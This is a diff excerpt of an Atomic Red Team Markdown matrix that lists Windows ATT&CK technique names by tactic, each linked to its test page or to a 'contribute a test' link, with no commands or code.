+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | RDP Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LSA Secrets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Screen Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Service Discovery](../../T1007/T1007.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
+| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
+| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
+| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
+| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
+| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
+| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
+| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
+| | | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
+| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
+| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
+| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
-| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Windows Service](../../T1543.003/T1543.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Service](../../T1543.003/T1543.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
| | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
@@ -80,6 +84,7 @@
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
